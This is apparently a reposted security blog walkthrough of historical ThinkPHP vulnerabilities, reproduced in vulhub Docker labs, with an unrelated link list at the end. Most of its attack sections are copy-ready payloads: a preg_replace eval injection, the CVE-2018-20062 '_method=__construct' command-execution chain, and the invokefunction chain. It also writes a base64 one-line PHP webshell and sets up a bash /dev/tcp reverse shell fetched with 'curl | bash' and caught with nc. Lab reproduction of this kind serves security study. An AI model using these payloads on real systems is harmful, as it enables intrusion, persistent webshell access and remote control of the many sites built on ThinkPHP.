ThinkPHP History Vulnerabilities

Enterprise 2023-07-15 23:29:21 views: null

Article directory

Introduction to ThinkPHP

Thinkphp is an open source framework. It is a lightweight PHP development framework developed by Chinese to support server environments such as windows/Unix/Linux.
Many cms are developed based on thinkphp, so if there is a problem with thinkphp, it will affect many websites developed based on thinkphp.

Thinkphp History Vulnerability

Version Vulnerability type
ThinkPHP3.2.3 Cache function design flaw can lead to Getshell
ThinkPHP3.2.3 The latest version update injection vulnerability
ThinkPHP3.2.X find_select_delete injection
ThinkPHP3.X order_by injection vulnerability
ThinkPHP5.0.X sql injection vulnerability
ThinkPHP5.0.10 Cache function design flaw can lead to Getshell
ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Leakage
ThinkPHP5.X order_by injection vulnerability
ThinkPHP5.X remote code execution

Thinkphp 2.x Arbitrary Code Execution Vulnerability

Vulnerability description

The reason for the vulnerability is that in the ThinkPHP 2.x version, the /e (executable mode) pattern matching route of preg_replace ('regular rule', 'replacement character', 'target character') is used:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

Cause the user's input parameters to be inserted into double quotes for execution, resulting in arbitrary code execution vulnerabilities.

Affected version

ThinkPHP 2.x

ThinkPHP 3.0

Vulnerability recurrence

vulhub

docker-compose up -d

docker ps

Visit the range address http://yourip:8080

Validate Vulnerabilities Using PoC

http://192.168.88.130:8080/index.php?s=/index/index/xxx/${@phpinfo()}

phpinfo is executed successfully, then try webshell

http://192.168.88.130:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}

Ant Sword Connection

Thinkphp5.0.23 Remote Code Execution Vulnerability (CVE-2018-20062)

Vulnerability description

Vulnerability in ThinkPHP5.0.23 version: The method to obtain the method does not correctly handle the method name, allowing the attacker to call any method of the Request class and construct an exploit chain, resulting in a remote code execution vulnerability.

Affected version

Thinkphp 5.0.0~ 5.0.23

Vulnerability recurrence

vulhub

docker-compose up -d

docker ps

Visit Range Address

To determine whether there is a loophole, visit the /index.php?s=captcha page, and an error will appear

Use the post request to execute the whoami command, id, pwd and other system commands, which will be echoed to the page

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

Use the echo command to write to the webshell, you need to base64 encode the one-sentence Trojan horse

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n
YWE8P3BocCBAZXZhbCgkX1BPU1RbJ2NtZCddKTs/PmM= | base64 -d > shell.php

Send a post request and access the shell.php file

Enter the server to check whether the upload is successful

bash reverse shell operation

Create a new xx.sh file on the attacking machine, and write the bash reverse shell command.

bash -i >& /dev/tcp/192.168.88.128/6666 0>&1

#IP为攻击机的ip,端口自定义

The http service guarantee is enabled on the attacking machine, and the target machine can access the xx.sh rebound shell file

python3 -m http.server 80

Attacker opens listening port 6666

nc -lvvp 6666

Using a post request, send the following poc

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.88.128/thinkphp5.0.23.sh | bash

Check the listening port and find a successful rebound

RCE vulnerability analysis caused by ThinkPHP 5.0.x not enabling mandatory routing (CNVD-2018-24942)

Vulnerability description

The framework does not strictly filter incoming routing parameters, allowing attackers to operate unintended controller classes to execute code remotely.

Affected version

ThinkPHP 5.0.5-5.0.22
5.1.0-5.1.30

Vulnerability recurrence

vulhub


docker-compose up -d 

docker ps

Visit the shooting range and build successfully

Write PoC

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

Remote Command Execution, PoC

/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&v
ars[1][]=whoami

write to webshell

/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>

/index.php?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n
bash反弹shell命令得base64编码 | base64 -d > shell9.php

Guess you like

Origin blog.csdn.net/weixin_44971640/article/details/128495915
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com